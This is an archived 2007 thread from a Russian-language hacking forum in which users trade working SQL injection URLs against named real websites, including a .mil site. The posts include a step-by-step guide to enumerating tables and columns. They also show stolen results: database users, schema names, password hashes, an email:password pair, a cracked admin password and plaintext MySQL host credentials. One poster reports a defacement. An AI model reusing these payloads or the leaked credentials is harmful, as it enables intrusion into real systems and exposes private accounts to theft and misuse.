ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.11.2007, 21:33
|
|
Новичок
Регистрация: 03.06.2007
Сообщений: 19
Провел на форуме:
378831
Репутация:
6
|
|
_http://www.deti.biz
Код:
http://www.deti.biz/product.php?s=1&a00=-1+union+select+concat(version(),0x3a,data base(),0x3a,us er()),2,3/*
5.0.45-community-log;detibizo_deti;detibizo_deti@localhost
Код:
http://www.deti.biz/product.php?s=1&a00=-1+union+select+TABLE_NA ME,2 ,3+from+INFO RMATION_SCHEMA.TABLES+LIMIT+94,1/*
94 таблицы
интересные:users ,users_roll ,sh_user и тд
Последний раз редактировалось Evgesha23; 12.11.2007 в 21:36..
|
|
|
12.11.2007, 21:41
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
Не знаю что дальше с этим делать... HELP!
Код:
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),7,8,9,10,11,12,13,14/*
|
|
|
|
12.11.2007, 22:55
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
Сообщение от 5taY3r
Не знаю что дальше с этим делать... HELP!
Код:
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),7,8,9,10,11,12,13,14/*
Но все просто:
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),aE S_DECRYPT(AES_ENCRYPT(version(),0x72),0x72),%208,9 ,10,11,12,13,14/*
AES_DECRYPT(AES_ENCRYPT('строка'),'blabla'), 'blabla') Часто бывают траблы с кодировкой и можно чтобы сильно не заморачиваться используют эту конструкцию.
|
|
|
|
12.11.2007, 22:59
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от 5taY3r
Не знаю что дальше с этим делать... HELP!
Код:
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),7,8,9,10,11,12,13,14/*
Смотрим версию:
Код:
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x20),0x20),7,8,9,10,11,12,13,14/*
Ну и начинай таблички подбирать
Код:
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM [имя_таблицы]/*
Заменяя [имя_таблицы] на имя которое возможно будет реальным названием одной из таблиц типа user, users, members и тд небольшой словарик подобного можешь найти воспользовавшись поиском...
После начинай перебирать столбцы
Код:
http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,[имя_столбца],7,8,9,10,11,12,13,14 FROM [имя_таблицы]/*
по аналогии с предыдущим примером
Ну а дальше опять спросишь...
ЗЫ вообще для таких постов есть специальная тема http://forum.antichat.ru/thread46016.html
ЗЫЫ и когда научимся читать статьи по интересующей теме их же не для себя писали так?
__________________
Кто я?..
|
|
|
|
12.11.2007, 23:16
|
|
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217
Репутация:
2097
|
|
flaghouse.com
Код:
http://www.flaghouse.com/itemdy00.asp?T1=38525'%20or%201=@@version--&iorb=4764
version: Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
system_user: ecomlive
db_name: Ecomlive
americanmemorabilia.com
Код:
http://www.americanmemorabilia.com/Auction_Item.asp?Auction_ID=25746+or+1=@@version--
version: Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
user: AmerMem
db: AmericanMemorabilia
gamerevolution.com
Код:
http://www.gamerevolution.com/manifesto/view.php?id=-193+union+select+1,2,concat_ws(char(58),version(),user(),database()),4,5,6,7,8,9,0,11+--+
4.1.21-standard-log:gamerev@10.15.178.62:gamerev
Код:
http://www.gamerevolution.com/manifesto/view.php?id=-193+union+select+1,2,concat_ws(char(58),username,user_password,user_icq,user_email),4,5,6,7,8,9,0,11+from+phpbb_users+limit+12,1+--+
dUKE:eea342a57c9313484e2b73715a5cbdb1:froggy
В саму админку попасть не удалось, там стоит дополнительная авторизация
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
|
|
|
|
13.11.2007, 01:41
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
mil
www.esi.mil
POST Инъекция в поле email:
Код:
http://www.esi.mil/forgotPassword.asp
version:
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
user:esi2005admin
db:ESI2005
Базы:
Код:
DONCIODashboard
DONCIOInternetDB
EmailSurvey
ESI2005
ESI2005(Таблы)
Код:
AgreementType
AgreementTypeLookup
Audit
Contacts
DesignatedCategory
Final_Price
ManufacturerLookup
Questions
Requirement_Files
Requirement_Specs
Requirements_Changes
Software_Managers
Software_Products
Status
tblProducts
tblForum
tblESA
Интересная Contacts:
Код:
idKey
sName
sEmail
sPassword
Например:
webmaster@bcinow.com:ESI8524R
|
|
|
|
13.11.2007, 13:35
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
labootika.com
Код:
http://www.labootika.com/catalog.php?idproduit=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*&cat=1012&PHPSESSID=397829af48e28835dd7cc832800fcad9
4.0.25-standard-log:labootik:labootik@10.0.70.13
доступ к mysql прикрыт
perlasuferintei.ro
Код:
http://www.perlasuferintei.ro/catalog.php?mod=detaliiCarte&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12/*
4.0.27-standard : perla_perlasuferintei : perla@localhost
maxishop.lv
Код:
http://www.maxishop.lv/?p=prece&id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sad=5
4.1.16:maxishoputf:maxishoputfuser@localhost
и снова прикрыт доступ к mysql 
|
|
|
|
13.11.2007, 13:37
|
|
Новичок
Регистрация: 08.11.2007
Сообщений: 1
Провел на форуме:
212006
Репутация:
28
|
|
Сообственно http://www.dom3.ru/blog/view/-5867')+union+select+'hfd'/*/0/196/
+ мне ))ыы
|
|
|
|
13.11.2007, 14:22
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
bazar.glo-con.com
Код:
http://bazar.glo-con.com/it/property_directory.php?region_code=46&country_code=-1+union+select+concat_ws(0x3a,version(),database(),user())/*&for_sale=Y
109 таблиц:
Код:
http://bazar.glo-con.com/it/property_directory.php?region_code=46&country_code=-1+union+select+table_name+from+information_schema.tables+limit+109,1/*&for_sale=Y
Поля таблы admin_logins:
Код:
idlogin
ida
logip
timelog
hashcode
Поля таблы user_logins:
Код:
idlogin
customer_code
logip
timelog
hashcode
|
|
|
|
13.11.2007, 19:04
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
www.royalvideo.ru (продажа фотоаппаратов)
_http://www.royalvideo.ru/news.php?id=3+union+select+1,2,3,version(),5,6
PHP 5.2.4, MySQL 5.0.45-log
Таблица users Колонки: login, id, pass
_http://www.royalvideo.ru/news.php?id=3+union+select+1,pass,3,login,5,6+from +users+limit+1,1
md5(pass) = d9d1b168eac8f197e0576b56cfc23ece
login  ass = admin:d9d1b168eac8f197e0576b56cfc23ece
d9d1b168eac8f197e0576b56cfc23ece:gfhjkm = расшифровал на www.milw0rm.com/md5/info.php
админка : http://www.royalvideo.ru/admin/index.php
был дефейс но ненадолго, часа 3-4.
так же через админку вычитал настроки к БД:
$MYSQLHOST = "u68865.mysql.masterhost.ru";
$MYSQLDB = "u68865_rv";
$MYSQLUSER = "u68865";
$MYSQLPASSWORD = "5ovialkyl7";
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?503668){kind=avatar}
Похожие темы
Линейный вид
